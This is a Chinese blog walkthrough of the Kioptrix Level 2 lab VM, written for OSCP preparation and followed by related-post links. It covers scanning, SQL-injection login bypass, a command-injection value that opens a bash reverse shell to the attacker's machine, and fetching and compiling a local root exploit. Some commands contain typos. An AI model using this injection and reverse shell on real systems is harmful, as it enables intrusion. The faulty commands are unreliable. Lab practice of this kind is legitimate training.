前期准备

  • kali任意版本
  • Kioptrix Level 2靶机搭建
  • 网络可以访问Google(全局VPN)可以实现

渗透报告

-老步骤,先主机发现,看看靶机IP多少

root@kali:netdiscover
Kioptrix Level 2         IP:192.168.16.144

-发现IP后使用老朋友Nmap,看看有么有什么端口或者漏洞可利用呀

# nmap -sV -sC -Pn 192.168.16.144



端口开放的挺多,但是好像也没有什么可以直接利用的,80.443.3306
-80端口:http协议
-443端口:即网页浏览端口,主要是用于HTTPS服务,是提供加密和通过安全端口传输的另一种HTTP。
-3306端口:mysql连接

收集到的消息在把我们往网站上引,那我们访问一下网站看是什么样

这个账号密码窗口,忍不住就想上Burp suite,那就干


暴力破解跑字典发现爆不出东西,换个思路SQLi Payloads爆破


生成这一条url---http://burpsuite/repeat/9/g57b0ixerfg1v4k6h206y1q6w8slsw12


网址账号密码就变成了网址ping功能,ping127.0.0.1/192.168.16.143(kali)都可以ping通,那是否可以使用nc进行连接,nc(瑞士军刀)好东西。

kali@root:nc -lvnp 4444
web页面中:127.0.0.1; bash -i >& /dev/tcp/192.168.16.143/4444 0>&1
建立连接之后三件套:我是谁,我在哪,我要做什么!!!


根据分析信息,找到对应漏洞之后进行利用。

kali@root:vi 2.c
kali@root:mv 2.c /var/www/html
kali@root:service apache2 start

bash-3.00$:wget http://192.168.16.143 2.c
bash-3.00$:gcc 2.c -0 2
bash-3.00$:chmod 777 2.c “提权是因为提醒权限不足”
bash-3.00$:./2
sh-3.00#:id


注:这个靶机其中关键的思路的认知,和对Burp suite工具的熟练掌握

【Oscp备考-Kioptrix2】相关推荐

  1. 【Oscp备考-Kioptrix 1】

    tip:时隔一年半,再次想提升一下自己的渗透能力水平,所以再三决定下想要开始的自己提升路OSCP备考,今天开始会分享自己的靶机渗透笔记呀,从0到OSCP,大家可以一起交流呀,学习,也欢迎大佬指点! 今 ...

  2. hackthebox-optimum(考点:hfs/windows)不用msf

    用msf做很快.这台靶机很多人做以及写的writeup都是msf.但针对oscp备考者,本篇文章不用msf 1.nmap 就一个80,提示是HFS 2.3 2. hfs漏洞利用 直接搜searchsp ...

  3. OSCP证书考试总结与终身学习 - 带你走上 OSCE3

    写在最前 如果你是信息安全爱好者,如果你想考一些证书来提升自己的能力,那么欢迎大家来我的 Discord 频道 Northern Bay.邀请链接在这里: https://discord.gg/9Xv ...

  4. oscp学习计划二期

    一期 只有一点点基础知识的我 看着Google和vulnhub 一边刷练习 一边看笔记 慢慢也有了自己的知识框架 但是还是感觉准备的不充分 笔记 之前就拿CSDN做笔记了 每篇博客都很少有文字 大多都 ...

  5. 孙子算经余数C语言,行测数量关系备考:探索《孙子算经》之剩余定理

    深圳公务员考试网:行测数量关系备考:探索<孙子算经>之剩余定理.市考期间,深圳中公教育将准备各类备考活动,如笔试峰会.模考大赛.免费公开课等,请大家留意关注,踊跃参与,更多2020深圳公务 ...

  6. 软件项目管理大作业_信息系统项目管理师该如何备考?

    教材和培训班选择 此考试网上资料多,选择也是因人而异,总时间只有70天,而看书时间更少,因此不可能把教材和各种备考书籍都看完,我的书就这几本:1. 信息系统项目管理师考试试题分类精解(2019)2. ...

  7. 小学五年级计算机备考方案,小学五年级备考方案(2)

    这节重点确定在整除的一系列概念和分数.小数的基本性质.四则运算和简便运算上. 1.系统地整理有关数的内容,建立概念体系,加强概念的理解,包括"小数乘除法""因数与倍数&q ...

  8. 如何备考上海市高等学校计算机一级,计算机一级考试备考攻略

    操作题重难点分析 基本操作题相对来说不是很复杂,主要考核文件或文件夹的一些常规操作,重点需要掌握创建快捷方式.搜索文件.设置文件属性的方法. 上网题分为两种题型,分别是 IE 浏览器的考核和 Outl ...

  9. 2011清华MBA备考全记录

    题记: 我的人生中,但凡大笔花钱,都会写上一大堆文字记录一下,从上学时候的第一台笔记本电脑,到上班后买房买车,都写过长篇甚至连载,MBA这东西,18万8,比俺的车都贵,不写点东西实在是对不起它了. 这 ...

最新文章

  1. Homestead 无法挂载共享目录解决方案
  2. SpringMessaging命令执行漏洞 cve-2018-1270
  3. 成功解决importError cannot import idnadata
  4. 蓝牙协议 HFP,HSP,A2DP,A2DP_CT,A2DP_TG,AVRCP,OPP,PBAP,SPP,FTP,TP,DTMF,DUN,SDP
  5. 快捷键截屏_QQ的Ctrl+Alt+A快捷键除了截屏,竟然还有这么多好用的功能!
  6. 在线模拟器RollerCoin使采矿业重回游戏
  7. 【计算机网络】因特网结构
  8. 信息学奥赛一本通(1159:斐波那契数列)
  9. app 怎么实现后端对前端的通知功能_app测试流程
  10. BIM知识 | BIM管线综合原则
  11. 安利一款全网最牛还是免费的群控软件
  12. 台式计算机调整显示亮度,台式电脑显示器屏幕亮度怎么调节?
  13. Keil暗色模式配置文件
  14. 发SCI,审稿人意见有一条是“English should be improved”,应该怎样回复?
  15. 阿里巴巴字体图标的使用
  16. arcgis for js 4 隐藏缩放按钮及底部powered by ESRI
  17. 新装win10系统的桌面没有“我的电脑”图标解决办法
  18. 魔兽世界怎么找回以前的服务器,魔兽世界怀旧服无法连接世界服务器怎么办?...
  19. ibm x3250 m4 安装linux,IBM system X3250 M4 配置RAID磁盘阵列的方法
  20. Qt框架类图大全,类继承关系一图搞定

热门文章

  1. 《系统思维》思维导图,掌握全局思维和整体思维
  2. Linux:du和sort命令的使用
  3. labview自动保存报表_Labview的office报表自动生成
  4. Android SoftAP 实现框架
  5. 产品设计中的静电(ESD)防护
  6. DNS服务器未响应解决方案
  7. android开发骰子动画,Android实现掷骰子效果
  8. RNN循环神经网络原理与示例
  9. 程序员行业,前端,测试,后端哪个未来工资高,或者发展前景好?
  10. C# 实现区块链(附c#完整源码即运行截图)